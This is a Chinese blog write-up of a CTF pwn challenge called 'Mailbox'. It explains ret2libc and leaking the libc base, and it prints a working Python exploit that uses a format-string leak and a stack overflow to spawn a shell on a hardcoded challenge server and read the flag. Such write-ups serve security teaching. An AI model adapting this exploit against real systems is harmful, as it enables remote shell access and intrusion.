Mailbox(getshell) writeup —— ret2libc的利用

最新推荐文章于 2024-06-01 22:21:19 发布
最新推荐文章于 2024-06-01 22:21:19 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: writeup 文章标签: writeup pwn shell ret2libc ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aix0321/article/details/45417513
版权

Hint:

ret2libc √

题目描述:

mailbox

libc-2.19.so

题目目录下面还有另外一个flag文件:)需要拿到shell才能看得到


Writeup:

ret2libc即为return-to-libc,返回到系统库函数执行。

数据执行保护机制(Data Execution Prevention)将非代码区段设置为不可执行属性,使得系统无法执行攻击者注入的Shellcode。

利用ret2libc可使程序返回至系统库函数,系统库中有个system函数,向该函数提供参数“/bin/sh”可拿到目标服务器shell。

因此,需要利用栈溢出,用system的真实地址(libc基址+相对地址,系统库函数的相对地址可以在libc-2.19.so中找到)覆盖当前函数栈中的返回地址([ebp+0x4]),用“/bin/sh”的真实地址覆盖栈中的第二个参数([ebp+0x0C])。第一个参数([ebp+0x8])需要用exit函数的真实地址覆盖,作为system函数执行完后的返回地址。


MailBox中已经发现了栈溢出点,于是乎得到system函数和“/bin/sh”的真实地址即可拿到Shell,而这些真实地址需要通过libc的基址进行计算得到。因此,libc基址是拿到Shell的关键。

第一次接触ret2libc,对于获取libc基址没有什么思路,从两个大神的writeup中找到了获取libc基址的方法。

1、用printf_plt覆盖返回地址,用printf_got覆盖第二个参数,exit函数覆盖第一个参数,跳转至printf_plt打印printf函数的真实地址,printf的真实地址减去相对地址即为libc的基址;

2、在libc-2.19.so中找到__libc_start_main函数,该函数调用main函数,因此,调用main函数后的指令的地址即为main函数的返回地址(相对)。在main的栈中找到返回地址([ebp+4]),利用MailBox的格式化字符串漏洞打印出来,用该地址减去main函数的返回地址(相对)即为libc的基址。

libc的基址是动态变化的,每次连接服务器都会得到一个新的基址,因此,需要在一次连接中完成基址获取和栈溢出。我认为方法一更简单一些,刚开始我也是通过这种方法获取的,可是获取基址的同时已经把栈溢出用掉了。如果想要ret2libc需要再次连接利用栈溢出,可是这时libc基址早已变化了,所以只好选择方法二(方法一可能可以通过返回至函数开头解决libc基址变化问题,有时间再尝试一下)。

代码如下:

#! /usr/bin/python
from zio import *
exit_plt = 0x08048990
io = zio(('121.201.7.145',7775))
'''#注册账号
io.read_until('Quit')
io.writeline('1' )
io.read_until('Name:')
io.writeline('volvo' )
io.read_until('Pass:')
io.writeline('volvo' )
'''
io.read_until('Quit')
io.writeline('2')		#登录
io.read_until('Name:')
io.writeline('volvo')
io.read_until('pass:')
io.writeline('volvo')
io.read_until('Quit')
io.writeline('3')		#SendMail
io.read_until('To:')
io.writeline('zxczxc')

io.read_until('Title:')
title = '%e'*45 + '%x'	<span style="white-space:pre">	#打印栈帧内容
io.writeline(title)
io.read_until('Body:')
base_addr = input("Input the ret_addr:") - 0x00019A83	#输入main返回地址
system_addr = base_addr + 0x00040190
binsh_addr = base_addr + 0x00160a24
body = 'a' * 51 + l32(system_addr) + l32(exit_plt) + l32(binsh_addr)	#ret2libc
io.writeline(body)
io.writeline('ls')
io.writeline('cat flag')
io.interact()

R00cky
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF泄漏libc基址的方法
liucc09的博客
01-05 3938
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8095
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
CTFPWN学习入门
11-02
  从基础开始,一步步教同学们从基础的栈溢出,栈溢出的原理以及在64位程序与32位程序下,如何去构造EXP,以及在有一般保护的情况下如你构造ROP链,在没有binsh与system函数的情况下如何去构造泄露如put,printf,write等函数的真实地址。然后教大家格式化字符串漏洞的利用,在开启canary下即存在栈溢出与格式化漏洞的情况下如保构造EXP来打通获取一个shell。学完课程同学们能够掌握格式化字符串漏洞与栈溢出漏洞的原理以及如何去构造EXP,掌握原理。
PWN学习】如何获取libc基址
Morphy_Amo的博客
12-09 7845
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
泄漏libc基地址
最新发布
yjh_fnu_ltn的博客
06-01 977
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
yii2-mailbox:Yii 2.0的简单邮箱
04-29
yii2-邮箱Yii 2.0的简单邮箱安装安装此扩展的首选方法是通过 。 无论运行php composer.phar require --prefer-dist hscstudio/yii2-mailbox "1.0"或添加"hscstudio/yii2-mailbox": "1.0"到composer.json文件的...
python使用mailbox打印电子邮件的方法
09-22
主要介绍了python使用mailbox打印电子邮件的方法,涉及Python打印电子邮件的相关技巧,需要的朋友可以参考下
基于Mailbox的图像误差扩散并行算法的 SOPC实现 june08_2.pdf
05-20
基于Mailbox的图像误差扩散并行算法的 SOPC实现
Exchange 2013 - Mailbox.pdf 英文版
04-04
Exchange 2013 - Mailbox.pdf 英文版 Exchange 2013 - Mailbox.pdf 英文版 Exchange 2013 - Mailbox.pdf 英文版 Exchange 2013 - Mailbox.pdf 英文版 Exchange 2013 - Mailbox.pdf 英文版 Exchange 2013 - Mailbox....
Nu_LB_NUC140_RTX_MailBox.rar
12-20
《Nu_LB_NUC140_RTX_MailBox.rar:RTX实时操作系统与邮箱机制在微控制器开发中的应用》 在嵌入式系统开发中,实时操作系统(RTOS)是必不可少的一部分,它能够帮助开发者有效地管理和调度系统资源,提高系统的响应...
ret2syscall前置知识
Rt1Text的博客
02-10 2773
1.目的 是拿到shell 2.具体操作 控制程序执行系统调用(字面理解就可) 3.系统调用是什么? 系统调用:system call 按照搜索的定义可理解为一种服务:程序运行在用户空间向操作系统内核(内核空间)请求更高权限运行 用户空间和内核空间可参考以下百度 用户空间_百度百科 (baidu.com) 系统调用提供用户程序与操作系统间的接口(大多数系统交互式操作系统需要在内核态执行) 系统调用就运行在内核空间 4.具体怎么做 linux在x86系统 触发int 0x80 ,借助
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2267
libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
使用ret2libc攻击方法绕过数据执行保护
海枫的专栏
02-08 1万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 2881
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2681
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2202
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
linux中ret2libc入门与实践
counsellor的专栏
08-23 6774
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
mailbox sv
08-04
回答: 在SystemVerilog中,mailbox是一种用于在模块之间传递消息的机制。可以使用new()方法创建mailbox。使用new()方法创建的mailbox是无界的,可以发送和接收任何类型的数据。例如,可以使用以下语法创建一个无界的mailboxmailbox mailbox_name = new(); [1] 此外,还可以使用new(m_size)方法创建有界的mailbox,其中m_size是一个整数变量,表示mailbox的大小。例如,可以使用以下语法创建一个有界的mailboxmailbox mailbox_name = new(m_size); [1] 在SystemVerilog中,还有两种类型的mailbox:通用mailbox和参数化mailbox。通用mailbox是默认的类型,可以发送和接收任何类型的数据。参数化mailbox用于传输特定类型的数据。例如,可以使用以下语法创建一个参数化mailboxmailbox#(type) mailbox_name; [2] SystemVerilog的mailbox类提供了一些方法来操作mailbox,包括put()、try_put()、get()、peek()、num()、try_get()和try_peek()等。这些方法可以用于向mailbox中放置消息、从mailbox中获取消息以及查询mailbox中的消息数量。例如,可以使用put()方法将消息放入mailbox中,使用get()方法从mailbox中获取消息。 [3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值